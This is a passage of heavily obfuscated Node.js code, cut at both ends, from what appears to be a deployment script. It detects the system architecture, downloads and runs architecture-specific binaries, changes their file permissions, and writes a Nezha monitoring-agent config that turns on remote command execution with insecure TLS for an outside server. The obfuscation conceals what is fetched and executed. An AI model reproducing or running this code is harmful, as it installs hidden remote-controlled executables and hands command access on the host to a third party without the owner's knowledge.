-_0x498fef._0x2a0960,_0x398a2d-_0x498fef._0x32c6ca,_0x398a2d,_0x5b8dca-_0x498fef._0x40fc17);}const _0x559b23=_0x5add8d(-_0x524d7b._0x49d4ac,-_0x524d7b._0x5abefd,-0x16d,-_0x524d7b._0x48ede5)+path[_0x40ac6c(_0x524d7b._0x49c85f,0x3de,_0x524d7b._0x22094b,0x441)](_0x2386c6)+_0x5add8d(-_0x524d7b._0x56ca1a,-_0x524d7b._0x418462,-0x69,-_0x524d7b._0x3c69c7)+_0x23ce72[_0x5add8d(_0x524d7b._0x1acda3,-0x10c,_0x524d7b._0x307023,-_0x524d7b._0x4fa316)];console[_0x5add8d(_0x524d7b._0x9896b2,_0x524d7b._0x461c5a,0x7f,_0x524d7b._0x15d24a)](_0x559b23);function _0x40ac6c(_0x3a2744,_0x55a2ba,_0x3a6862,_0x346fbb){return _0x105a86(_0x3a2744-_0x135fbf._0x5ab6c7,_0x55a2ba-_0x135fbf._0x4b5d38,_0x3a2744,_0x346fbb-_0x135fbf._0x457dac);}_0x5db1c6[_0x40ac6c(_0x524d7b._0xea0b89,0x3d0,_0x524d7b._0xb9d9f2,_0x524d7b._0x32fb6d)](_0x5bc941,_0x559b23);});}async function downloadFilesAndRun(){const _0x3e779b={_0xdb3f2:0x400,_0x37ce3d:0x394,_0x235971:0x15f,_0x51b92c:0x22f,_0x3a5d68:0x133,_0x19e3f1:0x32d,_0x5a52c5:0x3bb,_0x207c84:0x39c,_0xd461bc:0x487,_0x242cb0:0x479,_0x1a1b24:0x444,_0x41b9ee:0x3ec,_0x2c25dd:0x4f0,_0x236491:0x129,_0x4cd4b6:0x1ff,_0xcb1adf:0xed,_0x1c8fcf:0x18f,_0x28b6d6:0x1f5,_0x5603d7:0x101,_0x1295aa:0x1f4,_0x127ca1:0x15c,_0x2f6ac3:0x19d,_0x443744:0x211,_0x3df88c:0x5d7,_0x823a6:0x59f,_0xdcc2df:0x6aa,_0x43750d:0x3d4,_0x8b0c5f:0x3b5,_0x3e8c10:0x3bd,_0x4498c8:0x3a2,_0x2a8c4c:0x121,_0x2f0a3e:0x241,_0x359ff2:0x85,_0x28a00d:0x15a,_0x3d6608:0x2e4,_0x45dd6d:0x294,_0x56045f:0x1e3,_0x5c3e6b:0x124,_0x2332af:0x2c0,_0x3a0189:0x187,_0x40c36f:0x3a5,_0x15795c:0x32f,_0x5e58a7:0x2f4,_0x52d1b6:0x1cd,_0x4c937a:0x214,_0x482256:0x28,_0x5e589a:0x195,_0x588ff2:0x18d,_0x120b2a:0x241,_0xeefdb:0x315,_0x3ae59c:0x21d,_0x2cab91:0x551,_0x3c65e2:0x4b5,_0x2aaa4f:0x577,_0x23f9f7:0x50f,_0x55ccab:0x2d4,_0x2a1037:0x37c,_0x18fcaa:0x26b,_0x406005:0x179,_0xeeb679:0x380,_0x43c775:0x1e8,_0x3ba8ec:0x1c4,_0x537a64:0x182,_0x1e0bc0:0x111,_0x39485c:0xcc,_0x592818:0x498,_0x57f626:0x3b7,_0xea4f4:0x3da,_0x3bd24e:0x2f2,_0x3d36aa:0x4e4,_0x54ef46:0x664,_0x426fae:0x4cf,_0x5aa230:0x545,_0xcc32eb:0x4da,_0x58e8ed:0x52b,_0x16e1a4:0x1f7,_0x2e4550:0x2b9,_0x1e8478:0x109,_0x103a20:0x2c6,_0x5621cb:0x3d2,_0x4c6ee2:0x292,_0x345606:0x2cb,_0x11f672:0x1c6,_0x4a5de8:0x218,_0x1b519c:0x667,_0x5b761a:0x56c,_0x146ada:0x640,_0x4f4d0e:0x42f,_0x3674d4:0x443,_0x1440eb:0x576,_0x3b7fce:0x4a2,_0x5963cf:0x531,_0x53a4f0:0x563,_0x1f16ad:0x20d,_0x2608b7:0x1e4,_0x457ee8:0x30a,_0x3edab3:0x135,_0x547e7f:0x193,_0x4a7c11:0x1fa,_0x31bf41:0x209,_0x4505c4:0x243,_0x5f0187:0x257,_0x12706b:0x589,_0x7e5d3e:0x414,_0x3eeb54:0x510,_0x187dac:0x321,_0x274555:0x23b,_0x4e4d40:0x28c,_0x44f499:0x251,_0x35de77:0xba,_0x2d9133:0x4a8,_0xa5347c:0x29a,_0x2c6430:0x334,_0x1a46e5:0x288,_0x9bd9e6:0x278,_0x4044c9:0x5f9,_0x3e5d20:0x5cf,_0x15dc61:0x554,_0x3c11ad:0x6a7,_0x58f8be:0x429,_0x32c270:0x4d4,_0x2a1a4d:0x56b,_0xfa7211:0x5ad,_0x5c20c5:0x556,_0xdf6229:0x56f,_0x281045:0x617,_0x31d053:0x4e0,_0xe1e924:0x4b6,_0x51a8ca:0x475,_0x19e6a9:0x57b,_0x175cea:0x5d2,_0x212426:0x4b2,_0x55258c:0x5c9,_0x1aff6c:0x532,_0x5cc48f:0x63d,_0xefe03d:0x275,_0x1cc7ef:0x359,_0x31e9ba:0x1cf,_0x5474fa:0x4dc,_0x5032e0:0x57e,_0x404350:0x170,_0x331d3e:0x1ce,_0x20f375:0x296,_0x47ab0f:0x5a8,_0x4a1642:0x4af,_0x276ab2:0x415,_0x31abc4:0x63e,_0x2ab10a:0x561,_0x15186b:0x4a1,_0x281d9d:0x51d,_0x8c0dff:0x507,_0x2a576b:0x204,_0x4495c3:0x23f,_0x2a234c:0x364,_0x3cfe88:0x3b7,_0x2e9d72:0x3fe,_0x3f7a11:0x4cd,_0x2232f6:0x698,_0x50f66c:0x5ef,_0x378e7c:0x628,_0x332b22:0x702,_0x397fcb:0x3ae,_0x5c7610:0x3c9,_0x35e37b:0x345,_0x148d0a:0x3d2,_0x1c6875:0x57f,_0x41384e:0x4a6,_0x2268ec:0x61f,_0x45b15a:0x4b3,_0x49ef24:0x43d,_0x519e0a:0x456,_0x437031:0x25f,_0x5e694a:0x381,_0xa02824:0x189,_0x1cd982:0x393,_0x55239b:0x30c,_0x5d5626:0x58c,_0x13251c:0x57d,_0x374f9d:0x168,_0x294e84:0x29d,_0x4e993b:0x11d,_0x2b048c:0x320,_0x3b1f74:0x2f4,_0x2e4a9:0x56f,_0x24d37b:0x530,_0x5c18ce:0x4e6,_0x44cab2:0xd8,_0x54c1c6:0x1e5,_0x2954b6:0x1e1,_0x302dfb:0x103,_0x477c54:0x14f,_0x1e5e04:0x4e3,_0x4884e8:0x60a,_0x2d677e:0x24b,_0x17e83a:0x27b,_0x459986:0x314,_0xe3edac:0x1b8,_0x506de3:0x4e,_0x3d7f66:0x8,_0x8f998a:0x407,_0x10acd9:0x406,_0x253e45:0x359,_0x2f15bd:0x4d8,_0x41a99d:0x3ba,_0x4fdf48:0x1d2,_0x3eba23:0x1aa,_0x37b145:0x2b4,_0x4d8e33:0xdf,_0x4fc22d:0x6d1,_0x1d2de4:0xfa,_0x35e0d3:0xa3,_0x514c2:0x1b3,_0x54972c:0x1d8,_0xe1908f:0x330,_0x5c2f7d:0x5b7,_0x465615:0x592,_0x4f12a4:0x697,_0x1a0655:0x4f6,_0x2dcaee:0x2e4,_0x1594c7:0x3b7,_0xed40f3:0x2e1,_0x30f4e6:0x373,_0x47c618:0x320,_0x2eb6e5:0x3e3,_0x48830b:0x2c8,_0x2156ba:0x349,_0x1343f4:0x1f4,_0x3c7415:0x2e5,_0x2b9ec9:0xe4,_0x46ba2d:0x22e,_0x1ef5b1:0x263,_0x2e4c94:0x562,_0x1fa547:0x5d7,_0x1cc9af:0x202,_0x49ea71:0x318,_0x183948:0x1c9,_0x57c3f9:0x173,_0x42ff93:0xb3,_0x3cf268:0xe5,_0x57361a:0xb6,_0x3d4d3f:0x67,_0x461f36:0x25a,_0x4d3f38:0xf1,_0x5bcb1b:0x28e,_0x108843:0x538,_0x57dc19:0x47e,_0x5207ce:0x587,_0x34d4ed:0x5f4,_0x2ed2ae:0x64f,_0x44c1c2:0x462,_0x2a3a7b:0x15b,_0x51a202:0x23c,_0x5ef651:0x38a,_0x50f01e:0x48f,_0x3bdac1:0x422,_0x476069:0x371,_0x274c41:0x3d2,_0x3a51c8:0x481,_0x1313ce:0x3d2,_0x2cd6b2:0x51c,_0x810c75:0x2ec,_0x4c9753:0x3cc,_0x266233:0x111,_0x3af5bc:0xda,_0x143c59:0x4b,_0x16803e:0xb4,_0x2a036c:0x109,_0x3c7046:0x62,_0x362888:0x18c},_0x472a7b={_0x261659:0x28b,_0x50102a:0x23,_0x52b7d5:0xab},_0x183f53={_0x10985c:0x2be,_0xecf499:0x2c8,_0x5f1b4e:0x195,_0x445355:0xfb,_0x350fec:0x109,_0x515bef:0x138,_0x32be25:0x2f2,_0x2bb998:0x201,_0x5c4ba0:0x1f0,_0x79e6cb:0x256,_0x1ed25c:0x14f,_0x3d1e9d:0x292,_0x5b6ce5:0x13c,_0x1e07a8:0x1c,_0x3e0e36:0x23c,_0x53e26e:0x1b2,_0x167c45:0xd0,_0xb9ce15:0x96,_0x1f4477:0xad,_0x20286c:0x1b1,_0x31a783:0x192,_0x5b5c4d:0x273,_0x592216:0x1d5,_0x47adc9:0x24,_0x4969cf:0x81,_0xffa3a5:0x4f,_0x22b85f:0x151,_0x193cf6:0xb7,_0x580877:0x67,_0x50b909:0x5f,_0x30fa38:0x229},_0x690ec2={_0x48debc:0x1c6},_0x3d3afe={_0x1d4ad0:0xdc,_0xd7a5c:0x55},_0x545794={_0x51c2a9:0x106,_0x774a92:0x1f0,_0x29d7c1:0x3e,_0x2f13f2:0x26,_0xb11351:0x8c,_0xbd1218:0x64,_0x67870c:0x210,_0xbecddc:0x47,_0x19b69b:0x151,_0x17e081:0x161,_0x5ae707:0x2d3,_0x1c870b:0x319,_0x19c01e:0x232,_0x2498e6:0x3f8,_0x4c6017:0x48b,_0x44f5d8:0x378,_0xcefbe9:0x4ff,_0x214b05:0x67,_0x5e2346:0xd7,_0x377c38:0x38,_0x40e849:0x49f,_0x15721e:0x449},_0x24e07e={_0x4113c4:0x228,_0x13caa5:0x245,_0x46491b:0x1aa,_0x5bfc20:0x2be,_0x3ab0a9:0x47,_0x4061f7:0x34,_0xdab25f:0x64,_0x2a433c:0x180,_0x2717c4:0x1a4,_0x2a806f:0xf4},_0x5acc49={_0x3e22ec:0x556},_0x371018={'kAcAt':function(_0x4a7ffa,_0x410191,_0x2fef86,_0x47a493){return _0x4a7ffa(_0x410191,_0x2fef86,_0x47a493);},'ioiqS':_0x5a0a49(0x4da,_0x3e779b._0xdb3f2,0x405,_0x3e779b._0x37ce3d),'RrQZc':_0x2e4dc2(-_0x3e779b._0x235971,-_0x3e779b._0x51b92c,-0x20f,-_0x3e779b._0x3a5d68),'FXDDn':function(_0x189f96,_0x54aa5f,_0x47a179){return _0x189f96(_0x54aa5f,_0x47a179);},'AiUYG':function(_0x3af7b5,_0x3976e5){return _0x3af7b5===_0x3976e5;},'JgUsO':_0x5a0a49(_0x3e779b._0x19e3f1,_0x3e779b._0x5a52c5,_0x3e779b._0x207c84,_0x3e779b._0xd461bc),'ZDqUx':function(_0xa3b98e,_0x24afee){return _0xa3b98e!==_0x24afee;},'cdXUZ':'jbGJi','jZgHe':'CNZRA','KlCzU':function(_0x32d508,_0x112000){return _0x32d508!==_0x112000;},'hWBys':_0x5a0a49(_0x3e779b._0x242cb0,0x55a,0x55d,0x52b),'rOxZy':'arm','PzFec':_0x5a0a49(_0x3e779b._0x1a1b24,_0x3e779b._0x41b9ee,0x381,_0x3e779b._0x2c25dd),'upZFV':_0x2e4dc2(-_0x3e779b._0x236491,-_0x3e779b._0x4cd4b6,-_0x3e779b._0xcb1adf,-_0x3e779b._0x1c8fcf),'BzDhE':function(_0x2e3502){return _0x2e3502();},'mbprh':function(_0x1d66a8,_0xa695af){return _0x1d66a8(_0xa695af);},'aIQGu':_0x2e4dc2(-_0x3e779b._0x28b6d6,-_0x3e779b._0x5603d7,-_0x3e779b._0x1295aa,-0x17f),'bEWzB':function(_0x4578a1,_0x4aa1ff){return _0x4578a1(_0x4aa1ff);},'jPBdX':function(_0x177163,_0x368f27){return _0x177163&&_0x368f27;},'cUEHc':_0x2e4dc2(-0x25f,-_0x3e779b._0x127ca1,-_0x3e779b._0x2f6ac3,-_0x3e779b._0x443744),'Wypzc':_0x5a0a49(_0x3e779b._0x3df88c,_0x3e779b._0x823a6,_0x3e779b._0xdcc2df,0x512),'qfwSj':_0x5a0a49(_0x3e779b._0x43750d,_0x3e779b._0x8b0c5f,_0x3e779b._0x3e8c10,_0x3e779b._0x4498c8),'BpdNy':_0x2e4dc2(-_0x3e779b._0x2a8c4c,-_0x3e779b._0x2f0a3e,-_0x3e779b._0x359ff2,-_0x3e779b._0x28a00d),'NHCfY':_0x5a0a49(_0x3e779b._0x3d6608,0x3ba,0x337,_0x3e779b._0x45dd6d),'pYlFy':'true','Hydpl':'false','mSIrS':_0x2e4dc2(-_0x3e779b._0x56045f,-_0x3e779b._0x5c3e6b,-_0x3e779b._0x2332af,-_0x3e779b._0x3a0189),'tWPsT':'QzdMX','bPqhk':_0x5a0a49(_0x3e779b._0x40c36f,0x3be,_0x3e779b._0x15795c,_0x3e779b._0x5e58a7),'mFrzN':_0x2e4dc2(-0x14c,-_0x3e779b._0x52d1b6,-_0x3e779b._0x4c937a,-_0x3e779b._0x482256),'wdfSI':function(_0x6c1eab,_0x4260ab){return _0x6c1eab===_0x4260ab;},'bIYTt':_0x2e4dc2(-_0x3e779b._0x5e589a,-_0x3e779b._0x588ff2,-_0x3e779b._0x120b2a,-0x2a2),'LxjKQ':_0x2e4dc2(-0x2c2,-_0x3e779b._0xeefdb,-_0x3e779b._0x2f6ac3,-_0x3e779b._0x3ae59c),'qoKSd':function(_0x239fd9,_0xd3b9e3){return _0x239fd9(_0xd3b9e3);},'HZOfF':_0x5a0a49(_0x3e779b._0x2cab91,_0x3e779b._0x3c65e2,_0x3e779b._0x2aaa4f,_0x3e779b._0x23f9f7)},_0x500526=_0x371018[_0x2e4dc2(-_0x3e779b._0x55ccab,-0x35a,-_0x3e779b._0x2a1037,-0x2e0)](getSystemArchitecture),_0x53084b=_0x371018[_0x2e4dc2(-_0x3e779b._0x18fcaa,-_0x3e779b._0x406005,-_0x3e779b._0xeeb679,-_0x3e779b._0x43c775)](getFilesForArchitecture,_0x500526);if(_0x53084b[_0x2e4dc2(-_0x3e779b._0x3ba8ec,-_0x3e779b._0x537a64,-_0x3e779b._0x1e0bc0,-_0x3e779b._0x39485c)]===-0x4cd+-0x218d+-0x1*-0x265a){console[_0x5a0a49(_0x3e779b._0x592818,_0x3e779b._0x57f626,_0x3e779b._0xea4f4,_0x3e779b._0x3bd24e)](_0x5a0a49(_0x3e779b._0x3d36aa,0x57b,0x55b,_0x3e779b._0x54ef46));return;}const _0x236498=_0x53084b[_0x5a0a49(_0x3e779b._0x426fae,_0x3e779b._0x5aa230,_0x3e779b._0xcc32eb,_0x3e779b._0x58e8ed)](_0x5d7145=>{const _0x3d0871={_0x2e18f3:0x3fb,_0x5c1be0:0x291,_0x5519c5:0x276,_0x2d6b7b:0x2e7,_0x316733:0x65,_0xe5c929:0x9e,_0x3bc182:0x206,_0x491cf1:0x28a,_0x346be6:0x50},_0x5c8a26={_0x31d464:0x467,_0x200205:0x3a8,_0x4459b2:0x366,_0x519b59:0x2c0},_0x49c7d6={_0x2d6d8a:0x8c,_0x116cec:0xa6,_0x5ed48a:0x354};function _0x4baea5(_0xdc7d39,_0x3cd66e,_0x516759,_0xe542c5){return _0x2e4dc2(_0xdc7d39-_0x5acc49._0x3e22ec,_0x3cd66e-0x51,_0x516759-0x153,_0xe542c5);}function _0x2bd074(_0x5cd592,_0x1f8de2,_0xbf1578,_0x1f9c47){return _0x5a0a49(_0x5cd592-0x46,_0xbf1578- -0x60a,_0xbf1578-0x9f,_0x1f9c47);}if(_0x371018[_0x2bd074(-_0x545794._0x51c2a9,-0x1da,-0x1db,-_0x545794._0x774a92)](_0x371018['JgUsO'],'ojUqN'))return new Promise((_0x29ddda,_0x4d444a)=>{const _0x2a1a62={_0x14f960:0x1b3,_0x590a47:0x505,_0x2c67de:0xc7},_0x38dd1c={_0x5ab29d:0xab,_0x2ff1e4:0xb8};function _0x18b8ec(_0xd8388c,_0x4fc229,_0x374e27,_0x778a9){return _0x2bd074(_0xd8388c-0x13a,_0x4fc229-_0x38dd1c._0x5ab29d,_0x374e27-_0x38dd1c._0x2ff1e4,_0xd8388c);}const _0xeb585e={'ASHRX':function(_0x588d27,_0x18ccfd){return _0x588d27(_0x18ccfd);}};function _0x173df8(_0x1a610b,_0x47c561,_0x2b7349,_0xccd3aa){return _0x2bd074(_0x1a610b-_0x49c7d6._0x2d6d8a,_0x47c561-_0x49c7d6._0x116cec,_0x1a610b-_0x49c7d6._0x5ed48a,_0xccd3aa);}_0x371018[_0x173df8(_0x24e07e._0x4113c4,_0x24e07e._0x13caa5,_0x24e07e._0x46491b,_0x24e07e._0x5bfc20)](downloadFile,_0x5d7145[_0x18b8ec(-_0x24e07e._0x3ab0a9,_0x24e07e._0x4061f7,_0x24e07e._0xdab25f,_0x24e07e._0x2a433c)],_0x5d7145[_0x18b8ec(-0x149,-0x15d,-_0x24e07e._0x2717c4,-_0x24e07e._0x2a806f)],(_0x35fc2d,_0x4dc5c4)=>{function _0x41e507(_0x32bcfd,_0x3352f4,_0x20a0f8,_0x3e7fd1){return _0x18b8ec(_0x3352f4,_0x3352f4-_0x2a1a62._0x14f960,_0x20a0f8-_0x2a1a62._0x590a47,_0x3e7fd1-_0x2a1a62._0x2c67de);}_0x35fc2d?_0x4d444a(_0x35fc2d):_0xeb585e[_0x41e507(_0x5c8a26._0x31d464,_0x5c8a26._0x200205,_0x5c8a26._0x4459b2,_0x5c8a26._0x519b59)](_0x29ddda,_0x4dc5c4);});});else{const _0x40204e={};_0x40204e['TphQX']=_0x371018[_0x2bd074(-_0x545794._0x29d7c1,-_0x545794._0x2f13f2,-_0x545794._0xb11351,_0x545794._0xbd1218)],_0x40204e[_0x2bd074(-_0x545794._0x67870c,-_0x545794._0xbecddc,-_0x545794._0x19b69b,-_0x545794._0x17e081)]=_0x371018[_0x4baea5(_0x545794._0x5ae707,_0x545794._0x1c870b,_0x545794._0x19c01e,_0x545794._0x2498e6)];const _0xccd009=_0x40204e;_0x371018['FXDDn'](_0x41da51,_0x4baea5(_0x545794._0x4c6017,0x37e,_0x545794._0x44f5d8,_0x545794._0xcefbe9)+_0x59a307[_0x2bd074(_0x545794._0x214b05,_0x545794._0x5e2346,-_0x545794._0x377c38,0x36)]('\x20')+_0x4baea5(_0x545794._0x40e849,_0x545794._0x15721e,0x3ac,0x56e),_0x341f51=>{const _0x18be76={_0x113465:0x3e3,_0x1bc9cb:0xd7},_0x18df96={_0x2f0149:0x551,_0x3b8e72:0x36};_0xd8ce20[_0x401de7(-0x31a,-0x2cb,-_0x3d0871._0x2e18f3,-0x2f3)]();function _0x401de7(_0x262351,_0x3ecef5,_0x45bf36,_0x33c547){return _0x4baea5(_0x33c547- -_0x18df96._0x2f0149,_0x3ecef5-0x2c,_0x45bf36-_0x18df96._0x3b8e72,_0x3ecef5);}function _0x91e636(_0x4debe8,_0x5641c8,_0x52d9ea,_0x4816f2){return _0x4baea5(_0x5641c8- -_0x18be76._0x113465,_0x5641c8-_0x18be76._0x1bc9cb,_0x52d9ea-0x162,_0x4debe8);}_0x83f841[_0x401de7(-_0x3d0871._0x5c1be0,-0x34c,-_0x3d0871._0x5519c5,-_0x3d0871._0x2d6b7b)](_0xccd009[_0x91e636(-_0x3d0871._0x316733,0x45,-0x51,_0x3d0871._0xe5c929)]),_0x15feae[_0x401de7(-0x396,-_0x3d0871._0x3bc182,-_0x3d0871._0x491cf1,-_0x3d0871._0x2d6b7b)](_0xccd009[_0x91e636(_0x3d0871._0x346be6,-0x77,-0x1f,-0x10)]);});}});try{await Promise[_0x2e4dc2(-_0x3e779b._0x16e1a4,-0x1f4,-_0x3e779b._0x2e4550,-_0x3e779b._0x1e8478)](_0x236498);}catch(_0x4977c0){console['error'](_0x371018[_0x2e4dc2(-_0x3e779b._0x103a20,-_0x3e779b._0x5621cb,-0x2fa,-_0x3e779b._0x4c6ee2)],_0x4977c0);return;}function _0x5a0a49(_0x46b2b4,_0x7459d0,_0x52e0e2,_0x1b5bf4){return _0x5d6c89(_0x7459d0-0x418,_0x7459d0-_0x3d3afe._0x1d4ad0,_0x52e0e2-_0x3d3afe._0xd7a5c,_0x1b5bf4);}function _0x41f842(_0x298537){const _0x5c452a={_0x51848d:0x434,_0x4135e3:0x5ee,_0x79874b:0x571,_0xc1808f:0x553,_0x107078:0x548,_0x15f785:0x54e,_0x367a2c:0x2e3,_0x5743b5:0x1a6,_0x14a37d:0x1c0,_0x244712:0x246,_0x2e49ed:0x187,_0x4d6000:0x25b,_0x20e74e:0x376,_0x1a8442:0x419,_0x484a5e:0x3cb,_0x418f9f:0x466,_0x3f8c20:0x366,_0xb86a49:0x4f3,_0x1e31ef:0x3e7},_0x26d551={_0x209fac:0x390,_0x32056e:0x3b4,_0x15c05c:0x327,_0x455680:0x3b8,_0x5ab74e:0x52,_0x5e9cf4:0x147,_0x17d620:0x15a,_0x332ea1:0xba,_0x387bbf:0x21c,_0x3c8541:0x1b1,_0x2e76be:0x6b,_0x253ec2:0x11e},_0x119eb8={_0x3af476:0x0,_0x39b411:0xd9},_0x12e7fe={_0x3ca50d:0x1dd,_0x338da0:0x61d,_0x22d0d1:0x140},_0x2a9f1c={_0x38f1ad:0x27,_0x285c7e:0x9e},_0x1dccdf={_0xdd90a2:0x1cb},_0x37d57e={'aDDqk':function(_0x599506,_0x1d03cd){function _0x29046e(_0x1eabe7,_0xe4e7e,_0x2fa88b,_0x2eaa94){return _0x4999(_0x2fa88b- -_0x1dccdf._0xdd90a2,_0x1eabe7);}return _0x371018[_0x29046e(_0x2a9f1c._0x38f1ad,0xd,-_0x2a9f1c._0x285c7e,-0x48)](_0x599506,_0x1d03cd);},'oeqez':_0x371018[_0x10807e(_0x183f53._0x10985c,0x268,0x35f,_0x183f53._0xecf499)],'ZfXEs':_0x371018[_0x2a82f8(-_0x183f53._0x5f1b4e,-_0x183f53._0x445355,-0x1b6,-0x21e)],'QPCWr':_0x2a82f8(-_0x183f53._0x350fec,-_0x183f53._0x515bef,-0xb9,-0x16c)};function _0x10807e(_0x4addf8,_0x6bcade,_0x396145,_0x128f76){return _0x2e4dc2(_0x4addf8-0x3b2,_0x6bcade-_0x690ec2._0x48debc,_0x396145-0x68,_0x396145);}function _0x2a82f8(_0x1b66fa,_0x39b50b,_0x3eac7f,_0xb606d0){return _0x5a0a49(_0x1b66fa-_0x12e7fe._0x3ca50d,_0x1b66fa- -_0x12e7fe._0x338da0,_0x3eac7f-_0x12e7fe._0x22d0d1,_0x39b50b);}if(_0x371018[_0x10807e(0x236,0x142,_0x183f53._0x32be25,_0x183f53._0x2bb998)](_0x371018[_0x10807e(_0x183f53._0x5c4ba0,_0x183f53._0x79e6cb,_0x183f53._0x1ed25c,_0x183f53._0x3d1e9d)],_0x371018[_0x2a82f8(-_0x183f53._0x5b6ce5,-_0x183f53._0x1e07a8,-_0x183f53._0x3e0e36,-_0x183f53._0x53e26e)])){const _0x3d48d6=_0x37d57e[_0x2a82f8(-0x54,-_0x183f53._0x167c45,_0x183f53._0xb9ce15,_0x183f53._0x1f4477)](_0x4c33c7,_0x37d57e[_0x2a82f8(-_0x183f53._0x20286c,-_0x183f53._0x31a783,-_0x183f53._0x5b5c4d,-_0x183f53._0x592216)])?_0x37d57e[_0x10807e(0xe3,-_0x183f53._0x47adc9,_0x183f53._0x4969cf,_0x183f53._0xffa3a5)]:_0x37d57e[_0x2a82f8(-0x14a,-_0x183f53._0x22b85f,-0x1ad,-_0x183f53._0x193cf6)],_0xad4fc5={};_0xad4fc5[_0x2a82f8(-_0x183f53._0x580877,_0x183f53._0x50b909,-0xc3,-0xcb)]=_0x4eab77,_0xad4fc5['fileUrl']=_0x3d48d6,_0x590683['unshift'](_0xad4fc5);}else{const _0x12b619=0x22a6+0x164a+0x61b*-0x9;_0x298537[_0x10807e(_0x183f53._0x30fa38,0x163,0x2fc,0x107)](_0x1860e2=>{const _0x48b329={_0x50a9ab:0x14e,_0x4f42de:0x2f};function _0x4f2ea6(_0x24e41b,_0x22caad,_0x5c5333,_0x391c70){return _0x10807e(_0x391c70-0xe9,_0x22caad-_0x119eb8._0x3af476,_0x24e41b,_0x391c70-_0x119eb8._0x39b411);}function _0x3beee9(_0x159ba0,_0x1667be,_0x3e515a,_0x50ce1b){return _0x2a82f8(_0x3e515a-0x5ef,_0x159ba0,_0x3e515a-0x6f,_0x50ce1b-0x7b);}if(_0x371018[_0x4f2ea6(0x2fe,_0x5c452a._0x51848d,0x33b,0x31f)](_0x371018['cdXUZ'],_0x371018[_0x3beee9(_0x5c452a._0x4135e3,_0x5c452a._0x79874b,0x56c,_0x5c452a._0xc1808f)])){if(fs[_0x3beee9(0x5c7,0x4bb,_0x5c452a._0x107078,_0x5c452a._0x15f785)](_0x1860e2)){if(_0x371018['KlCzU'](_0x4f2ea6(_0x5c452a._0x367a2c,_0x5c452a._0x5743b5,_0x5c452a._0x14a37d,0x2a5),_0x371018[_0x4f2ea6(_0x5c452a._0x244712,0x320,_0x5c452a._0x2e49ed,_0x5c452a._0x4d6000)]))fs[_0x4f2ea6(_0x5c452a._0x20e74e,0x2ac,_0x5c452a._0x1a8442,_0x5c452a._0x484a5e)](_0x1860e2,_0x12b619,_0x35338f=>{const _0xaa93f7={_0x7c510a:0x1f3,_0x2e4dc9:0x15d};function _0x32cf54(_0x54ea88,_0x997362,_0x283ba2,_0x401782){return _0x4f2ea6(_0x283ba2,_0x997362-0x191,_0x283ba2-_0xaa93f7._0x7c510a,_0x997362- -_0xaa93f7._0x2e4dc9);}function _0x5de57c(_0x43c81b,_0x32f824,_0x49deed,_0x4bbc38){return _0x4f2ea6(_0x49deed,_0x32f824-0xda,_0x49deed-_0x48b329._0x50a9ab,_0x4bbc38- -_0x48b329._0x4f42de);}_0x35338f?console[_0x5de57c(_0x26d551._0x209fac,_0x26d551._0x32056e,_0x26d551._0x15c05c,_0x26d551._0x455680)]('Empowerment\x20failed\x20for\x20'+_0x1860e2+':\x20'+_0x35338f):console[_0x32cf54(0xb3,_0x26d551._0x5ab74e,0xdd,_0x26d551._0x5e9cf4)](_0x5de57c(_0x26d551._0x17d620,_0x26d551._0x332ea1,_0x26d551._0x387bbf,_0x26d551._0x3c8541)+_0x1860e2+':\x20'+_0x12b619[_0x32cf54(-_0x26d551._0x2e76be,0xb7,_0x26d551._0x253ec2,-0x51)](0x1cf*0x9+0xb14+-0x5*0x577));});else return null;}}else _0x16fe3e[_0x4f2ea6(_0x5c452a._0x418f9f,_0x5c452a._0x3f8c20,_0x5c452a._0xb86a49,_0x5c452a._0x1e31ef)]('Error\x20executing\x20command:\x20'+_0x28f2d2);});}}function _0x2e4dc2(_0x46c4c8,_0x330280,_0x5adb70,_0x1fd04b){return _0x5d6c89(_0x46c4c8- -_0x472a7b._0x261659,_0x330280-_0x472a7b._0x50102a,_0x5adb70-_0x472a7b._0x52b7d5,_0x1fd04b);}const _0x13478d=NEZHA_PORT?[npmPath,webPath,botPath]:[phpPath,webPath,botPath];_0x371018[_0x2e4dc2(-0x1ac,-_0x3e779b._0x345606,-_0x3e779b._0x11f672,-_0x3e779b._0x4a5de8)](_0x41f842,_0x13478d);if(_0x371018[_0x5a0a49(_0x3e779b._0x1b519c,_0x3e779b._0x5b761a,0x642,_0x3e779b._0x146ada)](NEZHA_SERVER,NEZHA_KEY)){if(!NEZHA_PORT){if(_0x371018[_0x5a0a49(0x4c9,_0x3e779b._0x4f4d0e,_0x3e779b._0x3e8c10,_0x3e779b._0x3674d4)]('EfQEb',_0x5a0a49(_0x3e779b._0x1440eb,_0x3e779b._0x3b7fce,_0x3e779b._0x5963cf,_0x3e779b._0x53a4f0)))_0x26e1c5[_0x2e4dc2(-0x2ec,-0x337,-_0x3e779b._0x1f16ad,-_0x3e779b._0x2608b7)](_0x2d375d+'\x20already\x20exists');else{const _0x43c47c=NEZHA_SERVER[_0x2e4dc2(-0x1e4,-_0x3e779b._0x457ee8,-_0x3e779b._0x3edab3,-_0x3e779b._0x547e7f)](':')?NEZHA_SERVER[_0x2e4dc2(-0x21f,-0x333,-_0x3e779b._0x4a7c11,-0x178)](':')[_0x2e4dc2(-_0x3e779b._0x31bf41,-_0x3e779b._0x4505c4,-0x1d7,-_0x3e779b._0x5f0187)]():'',_0x35177c=new Set([_0x371018[_0x5a0a49(0x5ac,_0x3e779b._0x12706b,0x4d3,0x4c8)],_0x371018[_0x5a0a49(0x3a3,_0x3e779b._0x7e5d3e,_0x3e779b._0x3eeb54,_0x3e779b._0x187dac)],_0x371018['qfwSj'],_0x371018[_0x2e4dc2(-_0x3e779b._0x274555,-_0x3e779b._0x4e4d40,-0x26c,-_0x3e779b._0x44f499)],_0x371018['NHCfY'],_0x2e4dc2(-0x14c,-_0x3e779b._0x406005,-_0x3e779b._0x35de77,-_0x3e779b._0x4cd4b6)]),_0x577f18=_0x35177c['has'](_0x43c47c)?_0x371018[_0x5a0a49(_0x3e779b._0x2d9133,0x558,0x4e1,0x584)]:_0x371018[_0x2e4dc2(-_0x3e779b._0xa5347c,-_0x3e779b._0x2c6430,-_0x3e779b._0x1a46e5,-_0x3e779b._0x9bd9e6)],_0x1ead0d=_0x5a0a49(_0x3e779b._0x4044c9,_0x3e779b._0x3e5d20,_0x3e779b._0x15dc61,_0x3e779b._0x3c11ad)+NEZHA_KEY+'\x0adebug:\x20false\x0adisable_auto_update:\x20true\x0adisable_command_execute:\x20false\x0adisable_force_update:\x20true\x0adisable_nat:\x20false\x0adisable_send_query:\x20false\x0agpu:\x20false\x0ainsecure_tls:\x20true\x0aip_report_period:\x201800\x0areport_delay:\x